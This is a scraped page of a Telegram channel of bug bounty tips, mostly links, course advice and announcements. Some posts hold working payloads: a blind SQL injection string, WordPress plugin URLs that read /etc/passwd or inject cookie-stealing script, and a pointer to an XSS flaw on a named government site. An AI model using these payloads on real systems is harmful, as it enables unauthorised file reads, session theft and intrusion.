bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Bug bounty Tips

Some of the DNS tools...

Bug bounty Tips

Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20

Bug bounty Tips

⚡️WordPress endpoints to look at -
check these if you have these plugins. ⚡️

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

/wp-content/plugins/dzs-videogallery/admin/upload.php

/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

/wp-content/plugins/hd-webplayer/playlist.php

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

Bug bounty Tips

Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.

Bug bounty Tips

Join the discussion group guys

/channel/bug_hunting_talks

Bug bounty Tips

Today I got an interesting reflected XSS in a Karnataka gov website

/kn where the lang_name param is vulnerable

Bug bounty Tips

Thanks, guys, for this suggestion. I was stuck, but seeing the money and the content provided by Hack The Box Academy, I am planning to first take the CPT, as it covers almost all the topics, and also so many people say that the exam is tougher than OSCP. So after reading all those articles, Reddit suggestions and YouTube reviews, I am planning to first complete the CPT; once done, I will take the OSCP later. And I also suggest this to you guys, only if you are a beginner or an intermediate: first take the alternative courses to OSCP, and once you get things done, you will get confident and later you can pass the OSCP in one attempt. Because it costs a lot........ 🤑💰

Bug bounty Tips

Later on I will make a group

Bug bounty Tips

Follow the Tech Tips and_hacking channel on WhatsApp: https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A

Bug bounty Tips

Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!

Bug bounty Tips

https://blog.intigriti.com/hacking-tools/csrf-a-complete-guide-to-exploiting-advanced-csrf-vulnerabilities

Bug bounty Tips

OSI Model

The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.

The Seven Layers:

1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.

2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.

3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.

4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.

5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.

6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.

7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.

Bug bounty Tips

Video coming soon guys

Give a lot of reaction to this

Bug bounty Tips

Cross Site Scripting Mindmap

Bug bounty Tips

#Tech_book
#cryptography
"Cryptography and Embedded Systems Security", 2024.

Bug bounty Tips

https://cyfare.net/

- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox

Bug bounty Tips

Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html

Bug bounty Tips

What are the basic goals of good reconnaissance?

Bug bounty Tips

Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents

https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Bug bounty Tips

See, it really works: an easy 5-minute finding.

Bug bounty Tips

☄️AutoRecon - It is a multi-threaded network reconnaissance tool which performs automated enumeration of services.

🔗
https://github.com/Tib3rius/AutoRecon

Bug bounty Tips

Actually, I am using a foreign number, so no need to worry if it's banned in India.

Bug bounty Tips

Join my WhatsApp channel

Bug bounty Tips

https://medium.com/@pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce

Bug bounty Tips

I am really sorry, guys. I left my place because of some emergency work. I will only be coming back on Monday, so I will not be active till Monday, so please don't mind.

Bug bounty Tips

Small update on the upcoming video

I will upload it soon😌

Bug bounty Tips

I was Meditating for Ideas And This Popped up

" The Thoughts From Universe"

Idk We will call It whatever
Coz I am not familiar with this concept

Says That


Universe Live At Harmony at Neutral state(=) and That's the Refresh point

But Grows and Falls on charge state ( - or +)
Means At charged State It Grows

Eg - Success and Failure

And In Charge state
Both comes in one Hand

If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge

Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins

But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point

Like If You Are Having Intense Cravings about Something
Then Think Painful thoughts about that Addiction

Then Thing will neutralise


I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe

I know it sounds lots like Yapping
But I would take it seriously

- Aijak Ofc

Bug bounty Tips

Bug-Bounty notes

>💛Welcome to the Future of Cybersecurity
>Overview
👣OSINT
ℹ️Recon Tips
>✳️Mastering the Art of Writing Clear and Effective Vulnerabilities Report
>Twitter
🌆Subdomain Enumeration
>Tools
🔑Nmap's NSE Scripts for Ethical Password Testing
👻Cheat-sheet's
>Exploitation

Link 🔗:-
https://book.cipherops.xyz

Author: @laazy_hack3r

@GitBook_s

Bug bounty Tips

LFI | RFI | Traversal Cheat Sheet 🔰

🔖#infosec #cybersecurity #hacking #pentesting #security

Bug bounty Tips

#Cyber_Education
Using SeTcbPrivilege for educational purposes
https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb
